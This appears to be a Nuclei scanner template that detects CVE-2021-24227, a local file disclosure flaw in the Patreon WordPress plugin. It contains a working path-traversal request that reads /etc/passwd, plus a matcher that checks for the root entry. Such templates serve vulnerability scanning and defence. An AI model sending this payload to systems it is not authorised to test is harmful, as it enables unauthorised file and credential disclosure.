id: CVE-2021-24227

info:
  name: Patreon WordPress < 1.7.0 - Unauthenticated Local File Disclosure
  author: theamanrawat
  severity: high
  description: The Jetpack Scan team identified a Local File Disclosure vulnerability
    in the Patreon WordPress plugin before 1.7.0 that could be abused by anyone visiting
    the site. Using this attack vector, an attacker could leak important internal
    files like wp-config.php, which contains database credentials and cryptographic
    keys used in the generation of nonces and cookies.
  reference:
    - https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016
    - https://wordpress.org/plugins/patreon-connect/
    - https://jetpack.com/2021/03/26/vulnerabilities-found-in-patreon-wordpress-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24227
    cwe-id: CWE-200
  tags: wordpress,patreon-connect,unauth,cve2021,lfi,patreon,wp,wpscan,cve

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200